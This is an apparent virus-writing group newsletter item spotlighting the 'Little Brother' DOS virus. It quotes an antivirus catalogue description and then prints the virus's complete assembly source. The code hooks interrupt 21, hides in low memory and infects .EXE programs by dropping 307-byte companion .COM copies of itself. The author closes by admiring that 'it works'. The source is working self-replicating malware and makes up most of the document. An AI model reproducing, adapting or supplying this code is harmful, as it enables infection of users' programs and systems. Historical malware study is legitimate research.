ARCV NEWS 001. - Virus Spotlight - Little Brother. Now this virus, is rather crafty as is relies on good old MSDOS program handling to work, ie. The Fact that .COM files are allways load before .EXE files. First lets see what Patti has to say. Virus Name: Little Brother Aliases: V Status: Rare Discovered: October, 1991 Symptoms: 307 byte .COM files Origin: The Netherlands Eff Length: 307 Bytes Type Code: SRCE - Spawning Resident .EXE Infector Detection Method: ViruScan, AVTK 5.54+, F-Prot 2.03+, Novi 1.1d+ Removal Instructions: Delete infected .COM programs General Comments: The Little Brother virus was submitted from the Netherlands in October, 1991. This virus is a spawning virus similar in technique to the Aids 2 and Twin-351 viruses. The first time a program infected with Little Brother is executed, Little Brother will become memory resident in a "hole" in low system memory in the system data area, hooking interrupt 21. There will be no change in total system or available free memory. Once resident, the Little Brother virus will infect .EXE programs when they are executed. The .EXE program itself will not be altered, but a corresponding .COM program will be created by the virus of 307 bytes. This corresponding.COM program will contain pure virus code and have a date/time stamp in the DOS directory of when it was created. The following text strings can be found in the 307 byte .COM files: "Little Brother" "EXE COM" Since DOS will execute .COM programs before .EXE programs, whenever the user attempts to execute a .EXE program, the corresponding .COM program will be executed first. The .COM program, when finished will then start the .EXE program the user was attempting to execute. Well lets get to the Asm source. --------------------------------------------------------------------------- cseg segment assume cs:cseg,ds:cseg,es:nothing org 100h FILELEN equ quit - begin RESPAR equ (FILELEN/16) + 17 VER_ION equ 1 oi21 equ quit nameptr equ quit+4 DTA equ quit+8 .RADIX 16 ;************************************************************************** ;* Start the program! ;************************************************************************** begin: cld mov ax,0DEDEh ;already installed? int 21h cmp ah,041h je cancel mov ax,0044h ;move program to empty hole mov es,ax mov di,0100h mov si,di mov cx,FILELEN rep movsb mov ds,cx ;get original int21 vector mov si,0084h mov di,offset oi21 movsw movsw push es ;set vector to new handler pop ds mov dx,offset ni21 mov ax,2521h int 21h cancel: ret ;************************************************************************** ;* File-extensions ;************************************************************************** EXE_txt db 'EXE',0 COM_txt db 'COM',0 ;************************************************************************** ;* Interupt handler 24 ;************************************************************************** ni24: mov al,03 iret ;************************************************************************** ;* Interupt handler 21 ;************************************************************************** ni21: pushf cmp ax,0DEDEh ;install-check ? je do_DEDE push dx push bx push ax push ds push es cmp ax,4B00h ;execute ? jne exit doit: call infect exit: pop es pop ds pop ax pop bx pop dx popf jmp dword ptr cs:[oi21] ;call to old int-handler do_DEDE: mov ax,04100h+VER_ION ;return a signature popf iret ;************************************************************************** ;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX) ;************************************************************************** infect: cld mov word ptr cs:[nameptr],dx ;save the ptr to the ;filename mov word ptr cs:[nameptr+2],ds push cs ;set new DTA pop ds mov dx,offset DTA mov ah,1Ah int 21 call searchpoint mov si,offset EXE_txt ;is extension 'EXE'? mov cx,3 rep cmpsb jnz do_com do_exe: mov si,offset COM_txt ;change extension to COM call change_ext mov ax,3300h ;get ctrl-break flag int 21 push dx xor dl,dl ;clear the flag mov ax,3301h int 21 mov ax,3524h ;get int24 vector int 21 push bx push es push cs ;set int24 vec to new handler pop ds mov dx,offset ni24 mov ax,2524h int 21 lds dx,dword ptr [nameptr] ;create the file (unique ;name) xor cx,cx mov ah,5Bh int 21 jc return1 xchg bx,ax ;save handle push cs pop ds mov cx,FILELEN ;write the file mov dx,offset begin mov ah,40h int 21 cmp ax,cx pushf mov ah,3Eh ;close the file int 21 popf jz return1 ;all bytes written? lds dx,dword ptr [nameptr] ;delete the file mov ah,41h int 21 return1: pop ds ;restore int24 vector pop dx mov ax,2524h int 21 pop dx ;restore ctrl-break flag mov ax,3301h int 21 mov si,offset EXE_txt ;change extension to EXE call change_ext return: ret do_com: call findfirst ;is the file a virus? cmp word ptr cs:[DTA+1Ah],FILELEN jne return mov si,offset EXE_txt ;does the EXE-variant exist? call change_ext call findfirst jnc return mov si,offset COM_txt ;change extension to COM jmp short change_ext ;************************************************************************** ;* Find the file ;************************************************************************** findfirst: lds dx,dword ptr [nameptr] mov cl,27h mov ah,4Eh int 21 ret ;************************************************************************** ;* change the extension of the filename (CS:SI -> ext) ;************************************************************************** change_ext: call searchpoint push cs pop ds movsw movsw ret ;************************************************************************** ;* search begin of extension ;************************************************************************** searchpoint: les di,dword ptr cs:[nameptr] mov ch,0FFh mov al,'.' repnz scasb ret ;************************************************************************** ;* Text and Signature ;************************************************************************** db 'Little Brother',0 quit: cseg ends end begin Quite a Simple idea for a virus but it works. Apche.